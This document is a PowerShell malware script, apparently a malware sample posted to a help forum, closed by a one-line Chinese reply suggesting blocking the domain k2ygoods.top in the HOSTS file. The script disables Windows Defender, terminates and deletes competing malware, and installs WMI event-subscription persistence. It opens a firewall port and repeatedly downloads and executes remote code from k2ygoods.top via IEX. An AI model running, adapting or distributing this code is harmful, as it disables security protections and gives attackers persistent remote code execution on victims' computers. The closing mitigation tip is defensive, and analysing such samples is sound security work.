$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="C:\Windows\debug\m\winlogon.exe"
#netsh advfirewall set allprofiles state off
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f
# oldservice
gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\conhost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Runtime.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Runtime.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Superfetch.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Superfetch.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='ApplicationsFrameHost.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\ApplicationsFrameHost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='MsTask.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MsTask.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;icacls "C:\ProgramData\migrate.exe" /setowner SYSTEM;icacls "C:\ProgramData\migrate.exe" /inheritance:r /deny "SYSTEM:F";}}
gwmi -Class 'Win32_Process' -Filter "Name='MicrosoftPrt.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MicrosoftPrt.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Wmiic.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Wmiic.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='IntelConfigService.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\IntelConfigService.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='warp.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\warp.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='WmiPrvSER.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Microsoft.NET\Framework\v3.0\WmiPrvSER.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"
if ($pExsit -and $sExsit) {
IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
}else{
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata2'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='updata2'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%updata%'" | Remove-WmiObject -Verbose
$filterName = 'updata'
$consumerName = 'updata2'
$exePath = 'cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(''http://k2ygoods.top/power.txt'')'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimfshex";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
sc.exe stop "Windows Updata"
sc.exe delete "Windows Updata"
sc.exe stop "Windows Management"
sc.exe delete "Windows Management"
netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp
#Start-Process -windowstyle hidden
IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}
你给 k2ygoods.top 这个域名在 HOSTS 里面强制指向 127.0.0.1 病毒自然就失效了! |
